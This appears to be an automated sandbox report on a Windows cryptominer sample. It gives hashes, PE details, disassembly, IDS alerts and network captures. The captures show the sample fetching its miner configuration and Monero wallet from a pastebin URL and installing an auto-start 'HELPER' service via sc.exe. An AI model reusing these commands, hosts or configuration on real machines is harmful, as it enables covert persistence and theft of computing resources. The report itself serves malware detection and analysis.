                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                    Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:modified
                                                    Size (bytes):7388
                                                    Entropy (8bit):3.2409833955289535
                                                    Encrypted:false
                                                    SSDEEP:96:cEi+AAsoJjykzEJ+AAsoJjykHEx+AAsoJjykr:cN+SoJbO+SoJvm+SoJj
                                                    MD5:682A9FE6CA2009782166CEF700D54985
                                                    SHA1:42F93CDD541A4D41B188232514F27B2329529BF0
                                                    SHA-256:0C0347B295B4F06AAA03B0A1C4732AAC2B206DF3AB8C08162C162529899FCCB2
                                                    SHA-512:F102595C5CFD5984163EEEA77778A994B44A455EFB9A1A1A438123EC4617D41A62E75561BFEB7CF4B4F6D9A69C779139BBEA75F92435E96FACD174DBC06A5C90
                                                    Malicious:false
                                                    Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. O.c.t. .. 0.4. .. 2.0.2.3. .1.2.:.0.3.:.4.2.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                    Process:C:\ProgramData\helper\helper.exe
                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):14544
                                                    Entropy (8bit):6.2660301556221185
                                                    Encrypted:false
                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                    Malicious:true
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                    File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                    Entropy (8bit):6.4701650998152225
                                                    TrID:
                                                    • Win64 Executable GUI (202006/5) 92.65%
                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                    • DOS Executable Generic (2002/1) 0.92%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:nbtypsfikkad.exe
                                                    File size:7'113'728 bytes
                                                    MD5:8bbc3cca3905e7ada419a806de48006c
                                                    SHA1:d9527797784197257a37c743da36f4de8197e924
                                                    SHA256:76de12fc1c2446150168ccb2520dea6b5f30ab53fb5cfae8926abcebf5c8364d
                                                    SHA512:66f9d6bd184be4e70acda9ea2a5757fb6ff31e76cf895b01143e2fbf3a342f1a14492ef8ad08ba27f323ab1ede351eab7f1f57efa35ef7978a2e80442d11bfcd
                                                    SSDEEP:196608:FMk+nb1nuqMbwhIEkfnpmLA9EFRJouTX:FSrkfnsLAeRr
                                                    TLSH:BC66F1D90E3E8DF2CFE95C248B418ECFBD4B12EFAB270254C486D1566471AF952B10DA
                                                    File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....T.g.........."......d...$l.....@..........@..............................l...........`........................................
                                                    Icon Hash:90cececece8e8eb0
                                                    Entrypoint:0x140001140
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x140000000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x67CA54B7 [Fri Mar 7 02:06:47 2025 UTC]
                                                    TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                    CLR (.Net) Version:
                                                    OS Version Major:6
                                                    OS Version Minor:0
                                                    File Version Major:6
                                                    File Version Minor:0
                                                    Subsystem Version Major:6
                                                    Subsystem Version Minor:0
                                                    Import Hash:de41d4e0545d977de6ca665131bb479a
                                                    Instruction
                                                    dec eax
                                                    sub esp, 28h
                                                    dec eax
                                                    mov eax, dword ptr [00006ED5h]
                                                    mov dword ptr [eax], 00000001h
                                                    call 00007F17B91B36FFh
                                                    nop
                                                    nop
                                                    nop
                                                    dec eax
                                                    add esp, 28h
                                                    ret
                                                    nop
                                                    inc ecx
                                                    push edi
                                                    inc ecx
                                                    push esi
                                                    push esi
                                                    push edi
                                                    push ebx
                                                    dec eax
                                                    sub esp, 20h
                                                    dec eax
                                                    mov eax, dword ptr [00000030h]
                                                    dec eax
                                                    mov edi, dword ptr [eax+08h]
                                                    dec eax
                                                    mov esi, dword ptr [00006EC9h]
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F17B91B3720h
                                                    dec eax
                                                    cmp edi, eax
                                                    je 00007F17B91B371Bh
                                                    dec esp
                                                    mov esi, dword ptr [000083F1h]
                                                    nop word ptr [eax+eax+00000000h]
                                                    mov ecx, 000003E8h
                                                    inc ecx
                                                    call esi
                                                    xor eax, eax
                                                    dec eax
                                                    cmpxchg dword ptr [esi], edi
                                                    sete bl
                                                    je 00007F17B91B36F7h
                                                    dec eax
                                                    cmp edi, eax
                                                    jne 00007F17B91B36D9h
                                                    dec eax
                                                    mov edi, dword ptr [00006E90h]
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F17B91B36FEh
                                                    mov ecx, 0000001Fh
                                                    call 00007F17B91B9624h
                                                    jmp 00007F17B91B3719h
                                                    cmp dword ptr [edi], 00000000h
                                                    je 00007F17B91B36FBh
                                                    mov byte ptr [006C8D29h], 00000001h
                                                    jmp 00007F17B91B370Bh
                                                    mov dword ptr [edi], 00000001h
                                                    dec eax
                                                    mov ecx, dword ptr [00006E7Ah]
                                                    dec eax
                                                    mov edx, dword ptr [00006E7Bh]
                                                    call 00007F17B91B961Bh
                                                    mov eax, dword ptr [edi]
                                                    cmp eax, 01h
                                                    jne 00007F17B91B370Bh
                                                    dec eax
                                                    mov ecx, dword ptr [00006E50h]
                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x92c00x3c.rdata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6cb0000x180.pdata
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x6ce0000x78.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x80a00x28.rdata
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x84100x138.rdata
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x94580x158.rdata
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x10000x62860x64001218910da0445e0467bfb2995a260769False0.5308203125data6.187745106550639IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                    .rdata0x80000x1a080x1c000c54c604631b020fadefd99d165c63e1False0.42578125data4.472246696483044IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .data0xa0000x6c0bb00x6c00003347be04ef4a6f03d827a3bb80135ab5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .pdata0x6cb0000x1800x200eb746a6bc05f7362fd466ea70e0e0860False0.5data3.0961664664652IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .00cfg0x6cc0000x100x200b18c7380298e104adf73576fa46bccc1False0.04296875data0.15127132530476972IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .tls0x6cd0000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .reloc0x6ce0000x780x200727189ddcf948e46f76c26a13679f9d5False0.228515625data1.429863764287425IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                    DLLImport
                                                    msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, _wcsicmp, _wcsnicmp, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, memset, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp
                                                    KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery

                                                    Download Network PCAP: filteredfull

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2025-03-11T17:45:00.975564+01002054247ET MALWARE SilentCryptoMiner Agent Config Inbound1104.20.3.235443192.168.2.449712TCP
                                                    • Total Packets: 45
                                                    • 10343 undefined
                                                    • 443 (HTTPS)
                                                    • 53 (DNS)
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 11, 2025 17:44:57.178384066 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:57.183706045 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:57.183779955 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:57.184079885 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:57.189140081 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:57.785767078 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:57.785783052 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:57.785841942 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:57.786921978 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:57.791611910 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:57.958487034 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:58.004882097 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:58.093157053 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:44:58.145490885 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:44:58.259345055 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:44:58.259381056 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:44:58.259466887 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:44:58.294018984 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:44:58.294053078 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:44:59.998817921 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.011708021 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.011744022 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.013386011 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.013458967 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.031857967 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.032063961 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.032146931 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.032165051 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.082956076 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.975352049 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.975454092 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.975498915 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.989563942 CET49712443192.168.2.4104.20.3.235
                                                    Mar 11, 2025 17:45:00.989582062 CET44349712104.20.3.235192.168.2.4
                                                    Mar 11, 2025 17:45:00.990386963 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:45:00.990791082 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:00.997186899 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:00.997251034 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:00.997687101 CET1034349711141.94.23.83192.168.2.4
                                                    Mar 11, 2025 17:45:00.997734070 CET4971110343192.168.2.4141.94.23.83
                                                    Mar 11, 2025 17:45:01.108392954 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:01.114398956 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:01.615525961 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:01.615555048 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:01.615607977 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:01.616529942 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:01.623898029 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:01.804585934 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:01.895622969 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:01.938381910 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:02.098622084 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:02.680334091 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:02.895494938 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:11.545799971 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:11.692378998 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:25.592222929 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:25.645553112 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:27.497186899 CET5656953192.168.2.4162.159.36.2
                                                    Mar 11, 2025 17:45:27.501890898 CET5356569162.159.36.2192.168.2.4
                                                    Mar 11, 2025 17:45:27.501971960 CET5656953192.168.2.4162.159.36.2
                                                    Mar 11, 2025 17:45:27.506738901 CET5356569162.159.36.2192.168.2.4
                                                    Mar 11, 2025 17:45:27.973084927 CET5656953192.168.2.4162.159.36.2
                                                    Mar 11, 2025 17:45:27.978022099 CET5356569162.159.36.2192.168.2.4
                                                    Mar 11, 2025 17:45:27.978075981 CET5656953192.168.2.4162.159.36.2
                                                    Mar 11, 2025 17:45:35.449527979 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:35.583229065 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:47.482414007 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:47.583143950 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:45:57.432411909 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:45:57.583204985 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:46:07.582026005 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:46:07.692591906 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:46:18.421878099 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:46:18.489490032 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:46:39.534849882 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:46:39.583261967 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:46:49.537266016 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:46:49.583277941 CET4971510343192.168.2.4162.19.224.121
                                                    Mar 11, 2025 17:46:59.561530113 CET1034349715162.19.224.121192.168.2.4
                                                    Mar 11, 2025 17:46:59.692704916 CET4971510343192.168.2.4162.19.224.121
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 11, 2025 17:44:57.168720961 CET5205653192.168.2.41.1.1.1
                                                    Mar 11, 2025 17:44:57.175885916 CET53520561.1.1.1192.168.2.4
                                                    Mar 11, 2025 17:44:58.250401020 CET5160253192.168.2.41.1.1.1
                                                    Mar 11, 2025 17:44:58.257987022 CET53516021.1.1.1192.168.2.4
                                                    Mar 11, 2025 17:45:27.496390104 CET5362161162.159.36.2192.168.2.4
                                                    Mar 11, 2025 17:45:27.985584021 CET5517953192.168.2.41.1.1.1
                                                    Mar 11, 2025 17:45:27.992680073 CET53551791.1.1.1192.168.2.4
                                                    Mar 11, 2025 17:45:31.084453106 CET5023753192.168.2.41.1.1.1
                                                    Mar 11, 2025 17:45:31.091360092 CET53502371.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 11, 2025 17:44:57.168720961 CET192.168.2.41.1.1.10xfd31Standard query (0)xmr-eu1.nanopool.orgA (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:58.250401020 CET192.168.2.41.1.1.10xf50aStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:45:27.985584021 CET192.168.2.41.1.1.10x6de5Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    Mar 11, 2025 17:45:31.084453106 CET192.168.2.41.1.1.10x2ca5Standard query (0)212.20.149.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org146.59.154.106A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org51.15.65.182A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org51.15.58.224A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org54.37.232.103A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org54.37.137.114A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org162.19.224.121A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org51.15.193.130A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org163.172.154.142A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org212.47.253.124A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org141.94.23.83A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:57.175885916 CET1.1.1.1192.168.2.40xfd31No error (0)xmr-eu1.nanopool.org51.89.23.91A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:58.257987022 CET1.1.1.1192.168.2.40xf50aNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:58.257987022 CET1.1.1.1192.168.2.40xf50aNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:44:58.257987022 CET1.1.1.1192.168.2.40xf50aNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                    Mar 11, 2025 17:45:27.992680073 CET1.1.1.1192.168.2.40x6de5Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    Mar 11, 2025 17:45:31.091360092 CET1.1.1.1192.168.2.40x2ca5Name error (3)212.20.149.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                    • pastebin.com
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449712104.20.3.2354438072C:\Windows\System32\svchost.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-03-11 16:45:00 UTC114OUTGET /raw/7ufXNeU9 HTTP/1.1
                                                    Accept: */*
                                                    Connection: close
                                                    Host: pastebin.com
                                                    User-Agent: cpp-httplib/0.12.6
                                                    2025-03-11 16:45:00 UTC391INHTTP/1.1 200 OK
                                                    Date: Tue, 11 Mar 2025 16:45:00 GMT
                                                    Content-Type: text/plain; charset=utf-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    x-frame-options: DENY
                                                    x-content-type-options: nosniff
                                                    x-xss-protection: 1;mode=block
                                                    cache-control: public, max-age=1801
                                                    CF-Cache-Status: EXPIRED
                                                    Last-Modified: Tue, 11 Mar 2025 16:45:00 GMT
                                                    Server: cloudflare
                                                    CF-RAY: 91ec850caff06b50-DFW
                                                    2025-03-11 16:45:00 UTC483INData Raw: 31 64 63 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 78 6d 72 2d 65 75 31 2e 6e 61 6e 6f 70 6f 6f 6c 2e 6f 72 67 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 31 30 33 34 33 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 38 39 6b 32 43 50 4a 58 4d 72 36 4a 79 58 6e 47 53 67 63 64 67 33 56 39 53 58 41 5a 53 4d 39 70 61 65 6b 37 69 57 37 55 39 48 72 41 41 55 5a 43 34 4c 70 36 57 4c 51 42 53 75 35 67 52 62 67 42 74 75 57 66 69 64 61 63 45 65 76 46 78 35 56 37 55 6d 5a 56 66 7a 4e 4b 52 6a 58 57 38 57 6b 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 66 61 6c 73 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c
                                                    Data Ascii: 1dc{ "algo": "rx/0", "pool": "xmr-eu1.nanopool.org", "port": 10343, "wallet": "89k2CPJXMr6JyXnGSgcdg3V9SXAZSM9paek7iW7U9HrAAUZC4Lp6WLQBSu5gRbgBtuWfidacEevFx5V7UmZVfzNKRjXW8Wk", "password": "", "nicehash": false, "ssltl
                                                    2025-03-11 16:45:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Target ID:0
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\svchost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                    Imagebase:0x7ff6ca680000
                                                    File size:55'320 bytes
                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:false

                                                    Target ID:1
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Users\user\Desktop\nbtypsfikkad.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Users\user\Desktop\nbtypsfikkad.exe"
                                                    Imagebase:0x7ff72e5f0000
                                                    File size:7'113'728 bytes
                                                    MD5 hash:8BBC3CCA3905E7ADA419A806DE48006C
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:2
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe delete "HELPER"
                                                    Imagebase:0x7ff6ec9a0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                    There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                    Target ID:3
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe create "HELPER" binpath= "C:\ProgramData\helper\helper.exe" start= "auto"
                                                    Imagebase:0x7ff6ec9a0000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:12:44:55
                                                    Start date:11/03/2025
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff62fc20000
                                                    File size:862'208 bytes
